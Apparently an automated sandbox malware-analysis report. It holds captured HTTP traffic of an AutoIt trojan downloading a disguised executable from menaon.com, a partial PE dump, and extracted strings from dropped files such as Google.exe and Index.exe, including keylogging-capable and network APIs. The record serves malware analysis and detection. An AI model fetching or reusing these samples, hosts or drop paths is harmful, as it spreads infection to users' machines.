Connection: Keep-Alive

Cache-Control: no-cache

Host: VVV.menaon.com

Cookie: __cfduid=d0636a81161a7706fbd55743c8c3a09fe1414389719010

HTTP/1.1 200 OK

Date: Mon, 27 Oct 2014 06:01:59 GMT

Content-Type: application/x-msdownload

Content-Length: 1017024

Connection: keep-alive

Last-Modified: Fri, 09 May 2014 17:36:12 GMT

Accept-Ranges: bytes

X-Frame-Options: SAMEORIGIN

Server: cloudflare-nginx

CF-RAY: 17fcaea2693f0ef7-EWR
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........Z..I;..I;..
I;...u{.A;..R.}.U;..R.I..;..R.M..;..I;...:[email protected];..R.H..;..R.y.H;..R.
~.H;..RichI;..........................PE..L...q.lS....................
......................@.......................................@.......
...........................>[email protected]....... ..xy...
[email protected]..................
..........text...Z........................... ..`.rdata..x............
...............@[email protected]...`[email protected].
......8..................@[email protected]....... [email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U............P.K.3...$.
.....$Ph......p.I...u(..$<.u....<.u.3...$....3........]...l.I...
$....3.............][email protected].].....K.z.G.....K...G..
...K./.G.....K.QLI.....K.H.G.....K..^I....t..2.....t......[]....t...(.
K.........K......3.[].........=..K..tA....K.u9.=..K..t.h..K..\........
..K.........K..t...l.I.....K...........U......=..K..u^....K.........K.
z.G.....K...G.....K./.G.....K.QLI.....K.H.G.....K..^I..V.....u(....K..
....S....E.P..............#E...].3...].....U...E...u.. ...].P.E..M
<<< skipped >>>

GET /downloo/bdMiniDownloaderEG_MENAON-Mini_32_3313.exe HTTP/1.1

User-Agent: AutoIt

Host: menaon.com

Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently

Date: Mon, 27 Oct 2014 06:01:59 GMT

Content-Type: text/html; charset=iso-8859-1

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d0636a81161a7706fbd55743c8c3a09fe1414389719010; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.menaon.com; HttpOnly

Location: hXXp://VVV.menaon.com/downloo/bdMiniDownloaderEG_MENAON-Mini_32_3313.exe

X-Frame-Options: SAMEORIGIN

Server: cloudflare-nginx

CF-RAY: 17fcae9fd0990ef1-EWR
b60..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>301 Moved Permanently</title>.<
script type="text/javascript">.//<![CDATA[.try{if (!window.Cloud
Flare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2
:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok2v=1613a3a185/"},atok:
"b57a6fbb75eac8598d1bfc34c0fe6f98",petok:"ce30079b34dd6b8d97b1266672d9
e042a286955e-1414389719-1800",zone:"menaon.com",rocket:"0",apps:{"ga_k
ey":{"ua":"UA-43776187-1","ga_bs":"2"},"cdnjs":{"__h":"1","cdnjs":"MO,
GF,FX,CS,JS"}}}];CloudFlare.push({"apps":{"ape":"080083a6b3e09cc9de99e
e2cd3538712"}});!function(a,b){a=document.createElement("script"),b=do
cument.getElementsByTagName("script")[0],a.async=!0,a.src="//ajax.clou
dflare.com/cdn-cgi/nexp/dok2v=919620257c/cloudflare.min.js",b.parentNo
de.insertBefore(a,b)}()}}catch(e){};.//]]>.</script>.<scri
pt type="text/javascript">.//<![CDATA[.window.__CF=window.__CF||
{};window.__CF.AJS={"ga_key":{"ua":"UA-43776187-1","ga_bs":"2"},"cdnjs
":{"__h":"1","cdnjs":"MO,GF,FX,CS,JS"}};.//]]>.</script><s
cript type="text/javascript" src="//ajax.cloudflare.com/cdn-cgi/nexp/d
ok2v=dccf16c0cc/appsh.min.js"></script><script type="text/
javascript">__CF.AJS.inith();</script><script type="text/j
avascript">./* <![CDATA[ */.var _gaq = _gaq || [];._gaq.push(['_
setAccount', 'UA-43776187-1']);._gaq.push(['_trackPageview']);..(funct
ion() {.var ga = document.createElement('script'); ga.type = 'text
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

@.reloc

SSh8*K

.hP6K

PSSSSSSh

Gt.Ht$

t.jGZf;

PSSShl

PVSShl

j.Zf;

;K|s%f

?#%X.y

GetProcessWindowStation

operator

kernel32.dll

oleaut32.dll

RegDeleteKeyExW

advapi32.dll

Error text not found (please report)

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

erroffset passed as NULL

POSIX collating elements are not supported

this version of PCRE is compiled without UTF support

PCRE does not support \L, \l, \N{name}, \U, or \u

support for \P, \p, and \X has not been compiled

this version of PCRE is not compiled with Unicode property support

\N is not supported in a class

WSOCK32.dll

VERSION.dll

WINMM.dll

COMCTL32.dll

MPR.dll

InternetCrackUrlW

HttpQueryInfoW

HttpOpenRequestW

HttpSendRequestW

FtpOpenFileW

FtpGetFileSize

InternetOpenUrlW

WININET.dll

PSAPI.DLL

IPHLPAPI.DLL

USERENV.dll

UxTheme.dll

GetProcessHeap

CreatePipe

GetWindowsDirectoryW

KERNEL32.dll

OpenWindowStationW

SetProcessWindowStation

CloseWindowStation

MapVirtualKeyW

EnumChildWindows

EnumWindows

VkKeyScanW

GetKeyState

GetKeyboardState

SetKeyboardState

GetAsyncKeyState

keybd_event

EnumThreadWindows

ExitWindowsEx

UnregisterHotKey

RegisterHotKey

GetKeyboardLayoutNameW

USER32.dll

SetViewportOrgEx

GDI32.dll

COMDLG32.dll

RegOpenKeyExW

RegCloseKey

RegCreateKeyExW

RegEnumKeyExW

RegDeleteKeyW

ADVAPI32.dll

ShellExecuteW

SHFileOperationW

ShellExecuteExW

SHELL32.dll

ole32.dll

OLEAUT32.dll

GetCPInfo

zcÁ

cq-%C$

i.wx4

sC%uH

_APqZ.tp

nz.ye

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>

<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

> >$>(>=>

5o6q6

6!6%6)6-616

343C3n3v3}3

:&:*:.:2:

4#4'4 4/43474;4

<$<,<4<<<\=

mscoree.dll

combase.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

USER32.DLL

>>>AUTOIT NO CMDEXECUTE<<<

CMDLINERAW

CMDLINE

/AutoIt3ExecuteLine

/AutoIt3ExecuteScript

APPSKEY

789:;<=>?

FTPSETPROXY

GUICTRLRECVMSG

GUICTRLSENDMSG

GUIGETMSG

GUIREGISTERMSG

HOTKEYSET

HTTPSETPROXY

HTTPSETUSERAGENT

ISKEYWORD

MSGBOX

REGENUMKEY

SHELLEXECUTE

SHELLEXECUTEWAIT

TCPACCEPT

TCPCLOSESOCKET

TCPCONNECT

TCPLISTEN

TCPNAMETOIP

TCPRECV

TCPSEND

TCPSHUTDOWN

TCPSTARTUP

TRAYGETMSG

UDPBIND

UDPCLOSESOCKET

UDPOPEN

UDPRECV

UDPSEND

UDPSHUTDOWN

UDPSTARTUP

SendKeyDelay

SendKeyDownDelay

TCPTimeout

WINDOWSDIR

AUTOITEXE

HOTKEYPRESSED

%s (%d) : ==> %s.:

Line %d:

Line %d (File "%s"):

%s (%d) : ==> %s:

AutoIt script files (*.au3, *.a3x)

*.au3;*.a3x

All files (*.*)

04090000

%u.%u.%u.%u

0.0.0.0

Mddddd

"%s" (%d) : ==> %s:

\??\%s

GUI_RUNDEFMSG

AUTOITCALLVARIABLE%d

255.255.255.255

Keyword

AUTOIT.ERROR

Null Object assignment in FOR..IN loop

Incorrect Object type in FOR..IN loop

3, 3, 12, 0

HKEY_LOCAL_MACHINE

HKEY_CLASSES_ROOT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_USER

HKEY_USERS

%d/d/d

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Index.exe

AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.

Missing operator in expression."Unbalanced brackets in expression.

Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.

0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.

Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.

Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.

3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.

Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.

String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.

Setup.exe_2404:

.text

`.data

.rsrc

@.reloc

GetProcessWindowStation

Setup.pdb

KERNEL32.dll

SetupEngine.dll

GetCPInfo

Setup.exe

version="1.0.0.0"

name="Microsoft.IronMan.IronSpigot"

<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

}~/%D(

.;6  (&%

1<76  '&

1=;;6  )%#

<;76  )%#

=<<7  ))%

=<<77  '%

=<<76 ))##

==<;7   '##

=<;76 ))##

=<<6  )'#

=<;76 ))#

==<;66 )'#

=<<66  (%

yKERNEL32.DLL

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

kernel32.dll

c:\29bb03690662e5ba2efc\Setup.exe

10.0.40219.1 built by: SP1Rel

SetupUI.exe

.NET Framework

10.0.40219.1

Google.exe_2196:

.text

`.rdata

@.data

.rsrc

@.reloc

SSh8*K

.hP6K

PSSSSSSh

Gt.Ht$

t.jGZf;

PSSShl

PVSShl

j.Zf;

;K|s%f

?#%X.y

GetProcessWindowStation

operator

kernel32.dll

oleaut32.dll

RegDeleteKeyExW

advapi32.dll

Error text not found (please report)

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

erroffset passed as NULL

POSIX collating elements are not supported

this version of PCRE is compiled without UTF support

PCRE does not support \L, \l, \N{name}, \U, or \u

support for \P, \p, and \X has not been compiled

this version of PCRE is not compiled with Unicode property support

\N is not supported in a class

WSOCK32.dll

VERSION.dll

WINMM.dll

COMCTL32.dll

MPR.dll

InternetCrackUrlW

HttpQueryInfoW

HttpOpenRequestW

HttpSendRequestW

FtpOpenFileW

FtpGetFileSize

InternetOpenUrlW

WININET.dll

PSAPI.DLL

IPHLPAPI.DLL

USERENV.dll

UxTheme.dll

GetProcessHeap

CreatePipe

GetWindowsDirectoryW

KERNEL32.dll

OpenWindowStationW

SetProcessWindowStation

CloseWindowStation

MapVirtualKeyW

EnumChildWindows

EnumWindows

VkKeyScanW

GetKeyState

GetKeyboardState

SetKeyboardState

GetAsyncKeyState

keybd_event

EnumThreadWindows

ExitWindowsEx

UnregisterHotKey

RegisterHotKey

GetKeyboardLayoutNameW

USER32.dll

SetViewportOrgEx

GDI32.dll

COMDLG32.dll

RegOpenKeyExW

RegCloseKey

RegCreateKeyExW

RegEnumKeyExW

RegDeleteKeyW

ADVAPI32.dll

ShellExecuteW

SHFileOperationW

ShellExecuteExW

SHELL32.dll

ole32.dll

OLEAUT32.dll

GetCPInfo

zcÁ

cq-%C$

MI.ih

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>

<requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

> >$>(>=>

5o6q6

6!6%6)6-616

343C3n3v3}3

:&:*:.:2:

4#4'4 4/43474;4

<$<,<4<<<\=

mscoree.dll

combase.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

USER32.DLL

>>>AUTOIT NO CMDEXECUTE<<<

CMDLINERAW

CMDLINE

/AutoIt3ExecuteLine

/AutoIt3ExecuteScript

APPSKEY

789:;<=>?

FTPSETPROXY

GUICTRLRECVMSG

GUICTRLSENDMSG

GUIGETMSG

GUIREGISTERMSG

HOTKEYSET

HTTPSETPROXY

HTTPSETUSERAGENT

ISKEYWORD

MSGBOX

REGENUMKEY

SHELLEXECUTE

SHELLEXECUTEWAIT

TCPACCEPT

TCPCLOSESOCKET

TCPCONNECT

TCPLISTEN

TCPNAMETOIP

TCPRECV

TCPSEND

TCPSHUTDOWN

TCPSTARTUP

TRAYGETMSG

UDPBIND

UDPCLOSESOCKET

UDPOPEN

UDPRECV

UDPSEND

UDPSHUTDOWN

UDPSTARTUP

SendKeyDelay

SendKeyDownDelay

TCPTimeout

WINDOWSDIR

AUTOITEXE

HOTKEYPRESSED

%s (%d) : ==> %s.:

Line %d:

Line %d (File "%s"):

%s (%d) : ==> %s:

AutoIt script files (*.au3, *.a3x)

*.au3;*.a3x

All files (*.*)

04090000

%u.%u.%u.%u

0.0.0.0

Mddddd

"%s" (%d) : ==> %s:

\??\%s

GUI_RUNDEFMSG

AUTOITCALLVARIABLE%d

255.255.255.255

Keyword

AUTOIT.ERROR

Null Object assignment in FOR..IN loop

Incorrect Object type in FOR..IN loop

3, 3, 12, 0

HKEY_LOCAL_MACHINE

HKEY_CLASSES_ROOT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_USER

HKEY_USERS

%d/d/d

%Documents and Settings%\%current user%\Application Data\Google\int\Google.exe

AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.

Missing operator in expression."Unbalanced brackets in expression.

Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.

0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.

Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.

Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.

3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.

Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.

String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.

bdMiniDownloaderEG_MENAON-Mini_32_3313.exe_3740:

.text

`.rdata

@.data

.rsrc

@.reloc

UU U!"UU#$UUUU%&'UUU(U)*U UUU,-.UU/0123UUUUUU4UUUUUUU5UUUUUU6789:;UUUUUUUU<UUU=>?@ABCDUUUUEUUUUFUUUUUUGUUHIUUUUUJKUUULMUUNUUUUUUUUUOUUPUQRST

!"FFF#F$Fÿ&F'()FFFFFFFFFFFFF*FFFFFFFFFFFF FF,-FFFFFFFFFFF.F/FFFFFFFFFFFFFF01FF234FF56789FFFFFFFF:;FF<=>FF?FFFFF@ABFFFFFCFDFFFFFE

tcPh

%u Wj%

t.Gj:W

t-hL}J

SSSSh

xSSSh

FTPjKS

FtPj;S

C.PjRV

<!--%s-->

&#xX;

</%s>

%s='%s'

%s="%s"

<![CDATA[%s]]>

standalone="%s"

encoding="%s"

version="%s"

RegOpenKeyTransactedW

RegCreateKeyTransactedW

httpheader

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

portuguese-brazilian

.jpeg

.html

0123456789

PORT

CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!

Closing connection %d

Curl_addHandleToPipeline: length: %d

Found bundle for host %s: %p

Server doesn't support pipelining

Connection %d seems to be dead!

About to connect() to %s%s port %ld (#%ld)

Connected to %s (%s) port %ld (#%ld)

IDN support not present, can't parse Unicode domains

Protocol %s not supported or disabled in libcurl

[^:]:%[^

:]://%[^

<url> malformed

http_proxy

%5[^:@]:%5[^@]

:%5[^@]

[%*45[0123456789abcdefABCDEF:.]%c

;type=%c

%s://%s%s%s:%hu%s%s%s

Port number too large: %lu

Couldn't find host %s in the _netrc file; using defaults

[email protected]

Couldn't resolve host '%s'

Couldn't resolve proxy '%s'

%s://%s

Found connection %d, with requests in the pipe (%d)

Re-using existing connection! (#%ld) with host %s

User-Agent: %s

Connection #%ld to host %s left intact

Failed to set SO_KEEPALIVE on fd %d

Failed to set SIO_KEEPALIVE_VALS on fd %d: %d

Couldn't bind to interface '%s'

Name '%s' family %i resolved to '%s' family %i

Couldn't bind to '%s'

getsockname() failed with errno %d: %s

Local port: %hu

Bind to local port %hu failed, trying next

bind failed with errno %d: %s

getpeername() failed with errno %d: %s

ssrem inet_ntop() failed with errno %d: %s

ssloc inet_ntop() failed with errno %d: %s

Failed connect to %s:%ld; %s

Could not set TCP_NODELAY: %s

TCP_NODELAY set

sa_addr inet_ntop() failed with errno %d: %s

Trying %s...

Failed to connect to %s: %s

couldn't connect to %s at %s:%d

Pipe broke: handle 0x%p, url = %s

In state %d with no easy_conn, bail out!

Operation timed out after %ld milliseconds with %lld out of %lld bytes received

Internal error clearing splay node = %d

Internal error removing splay node = %d

%s:%d

%5[^:]:%d:%5s

Resolve %s found illegal!

Added %s:%d:%s to DNS cache

Could not resolve %s: %s

init_resolve_thread() failed for %s; %s

getaddrinfo() failed for %s:%d; %s

Send failure: %s

Recv failure: %s

[%s %s %s]

23[^;

=]=I99[^;

httponly

skipped cookie with illegal dotcount domain: %s

skipped cookie with bad tailmatch domain: %s

#HttpOnly_

%s cookie %s="%s" for domain %s, path %s, expire %lld

%s%s%s

# Netscape HTTP Cookie File

# hXXp://curl.haxx.se/docs/http-cookies.html

# This file was generated by libcurl! Edit at your own risk.

# Fatal libcurl error

WARNING: failed to save cookies in %s

%s:%s:%s

%s:%.*s

%s:%s

%s:%s:x:%s:%s:%s

%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"

%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"

%s, opaque="%s"

%s, algorithm="%s"

Couldn't open file %s

Can't open %s for writing

Can't get the size of %s

Last-Modified: %s, d %s M d:d:d GMT

LDAP local: LDAP Vendor = %s ; LDAP Version = %d

LDAP local: %s

LDAP local: trying to establish %s connection

LDAP local: Cannot connect to %s:%hu

LDAP local: ldap_simple_bind_s %s

LDAP remote: %s

There are more than %d entries

CLIENT libcurl 7.30.0

MATCH %s %s %s

DEFINE %s %s

--:--:--

%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s

Failed to resolve "%s" for SOCKS4 connect.

SOCKS4%s request granted.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.

Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.

User was rejected by the SOCKS5 server (%d %d).

SOCKS5 GSSAPI per-message authentication is not supported.

No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)

Failed to resolve "%s" for SOCKS5 connect.

Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)

Can't complete SOCKS5 connection to %s:%d. (%d)

Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)

Refusing to issue an RTSP request [%s] without a session ID.

Transport:

Transport: %s

Refusing to issue an RTSP SETUP without a Transport: header.

Accept-Encoding: %s

Referer: %s

Range: %s

%s %s RTSP/1.0

Session: %s

%s%s%s%s%s%s

Unable to read the CSeq header: [%s]

Got RTSP Session ID Line [%s], but wanted ID [%s]

TFTP

set timeouts for state %d; Total %ld, retry %d maxtry %d

got option=(%s) value=(%s)

blksize is larger than max supported

%s (%d)

blksize is smaller than min supported

%s (%ld)

%s (%d) %s (%d)

invalid tsize -:%s:- value in OACK packet

%s%c%s%c

tftp_send_first: internal error

Received last DATA packet block %d again.

Received unexpected DATA packet block %d, expecting block %d

Timeout waiting for block %d ACK. Retries = %d

tftp_rx: internal error

Received ACK for block %d, expecting %d

tftp_tx: giving up waiting for block %d ack

tftp_tx: internal error, event: %i

TFTP finished

bind() failed; %s

TFTP response timeout

LOGIN

USER %s

APOP %s %s

AUTH %s

No known authentication mechanisms supported!

STLS not supported.

STARTTLS denied. %c

Access denied. %c

Access denied: %d

Authentication failed: %d

PASS %s

%s %s

POP3S not supported!

login

password

%cd

LOGIN %s %s

AUTHENTICATE %s %s

AUTHENTICATE %s

LIST "%s" *

SELECT %s

FETCH %s BODY[%s]

APPEND %s (\Seen) {%lld}

LOGINDISABLED

STARTTLS not supported.

IMAPS not supported!

Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d

Adding handle: send: %d

Adding handle: recv: %d

Site %s:%d is pipeline blacklisted

Server %s is blacklisted

Server %s is not blacklisted

- Conn %d (%p) send_pipe: %d, recv_pipe: %d

Preparing for accepting server on data port

FTP response timeout

FTP response aborted due to select/poll error: %d

CWD %s

getsockname() failed: %s

failed to resolve the address provided to PORT: %s

socket failure: %s

bind(port=%hu) on non-local address failed: %s

bind(port=%hu) failed: %s

bind() failed, we ran out of ports!

%s |%d|%s|%hu|

Failure sending EPRT command: %s

,%d,%d

Failure sending PORT command: %s

Connect data stream passively

PRET %s

PRET STOR %s

PRET RETR %s

REST %d

SIZE %s

MDTM %s

APPE %s

STOR %s

%c%c%c%u%c

Illegal port number in EPSV reply

%d,%d,%d,%d,%d,%d

Skips %d.%d.%d.%d for data connection, uses %s instead

%d.%d.%d.%d

Bad PASV/EPSV response: d

Can't resolve proxy host %s:%hu

Can't resolve new host %s:%hu

Failed to do PORT

dddddd

ddd d:d:d GMT

unsupported MDTM reply format

Got a d response code instead of the assumed 200

ftp server doesn't support SIZE

RETR %s

Failed FTP upload: 

RETR response: d

PBSZ %d

ACCT %s

Access denied: d

ACCT rejected by server: d

Got a d ftp-server response when 220 was expected

unsupported parameter to CURLOPT_FTPSSLAUTH: %d

PROT %c

Entry path is '%s'

QUOT command failed with d

MKD %s

Failed to MKD dir: d

PRET command not accepted: d

Remembering we are in dir "%s"

Failure sending ABOR command: %s

server did not report OK, got %d

QUOT string not accepted: %s

TYPE %c

Connecting to %s (%s) port %d

Wildcard - START of "%s"

Wildcard - "%s" skipped by user

Failure sending QUIT command: %s

Uploading to a URL without a file name!

FTPS not supported!

operation aborted by callback

seek callback returned error %d

the ioctl callback returned %d

ioctl callback returned error %d

Rewinding stream by : %zd bytes on url %s (zero-length body)

Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)

HTTP server doesn't seem to support byte ranges. Cannot resume.

Problem (%d) in the Chunked-Encoded data

Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)

Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld

Operation timed out after %ld milliseconds with %lld bytes received

No URL set!

[^?&/:]://%c

Issue another request to this URL: '%s'

Violate RFC 2616/10.3.2 and switch from POST to GET

Violate RFC 2616/10.3.3 and switch from POST to GET

Disables POST, goes with %s

WSAStartup failed (%d)

insufficient winsock version to support telnet

%s IAC %s

%s IAC %d

%s %s %s

%s %s %d

%s %d %d

Sending data failed (%d)

%s IAC SB

%s (unsupported)

%d (unknown)

USER,%s

7[^= ]%*[ =]%5s

Syntax error in telnet option: %s

Unknown telnet option %s

%c%c%c%c%s%c%c

%c%c%c%c

7[^,],7s

%c%s%c%s

WS2_32.DLL

failed to load WS2_32.DLL (%d)

failed to find WSACreateEvent function (%d)

failed to find WSACloseEvent function (%d)

failed to find WSAEventSelect function (%d)

failed to find WSAEnumNetworkEvents function (%d)

WSACreateEvent failed (%d)

WSAEnumNetworkEvents failed (%d)

WSACloseEvent failed (%d)

FreeLibrary(wsock2) failed (%d)

SMTP

EHLO %s

HELO %s

AUTH %s %s

Got unexpected smtp-server response: %d

Remote access denied: %d

smtp

MAIL FROM:%s

MAIL FROM:%s AUTH=%s

MAIL FROM:%s AUTH=%s SIZE=%s

MAIL FROM:%s SIZE=%s

RCPT TO:%s

RCPT TO:<%s>

MAIL failed: %d

RCPT failed: %d

SMTPS not supported!

Establish HTTP proxy tunnel to %s:%hu

%s:%hu

%s%s%s:%hu

Host: %s

CONNECT %s HTTP/%s

%s%s%s%s

HTTP/1.%d %d

TUNNEL_STATE switched to: %d

Received HTTP code %d from proxy after CONNECT

%sAuthorization: Basic %s

The requested URL returned error: %d

%s auth using %s with user '%s'

%s, d %s M d:d:d GMT

If-Modified-Since: %s

If-Unmodified-Since: %s

Last-Modified: %s

Chunky upload is not supported by HTTP 1.0

Host: %s%s%s

Host: %s%s%s:%hu

PTF://

Range: bytes=%s

Content-Range: bytes %s%lld/%lld

Content-Range: bytes %s/%lld

PTF://%s:%s@%s

%s HTTP/%s

%s%s%s%s%s%s%s%s%s%s%s

%s%s=%s

Internal HTTP POST error!

Content-Type: application/x-www-form-urlencoded

Failed sending HTTP POST request

Failed sending HTTP request

HTTP/

Avoided giant realloc for header (max is %d)!

The requested URL returned error: %s

HTTP error before end of send, stop sending

HTTP/%d.%d =

HTTP =

RTSP/%d.%d =

HTTP 1.0, assume close after body

HTTP/1.0 proxy connection set to keep alive!

HTTP/1.1 proxy connection set close!

HTTP/1.0 connection set to keep alive!

Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds

Unsupported protocol

URL using bad/illegal format or missing URL

A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.

FTP: weird server reply

FTP: The server failed to connect to data port

FTP: Accepting server connect has timed out

FTP: The server did not accept the PRET command.

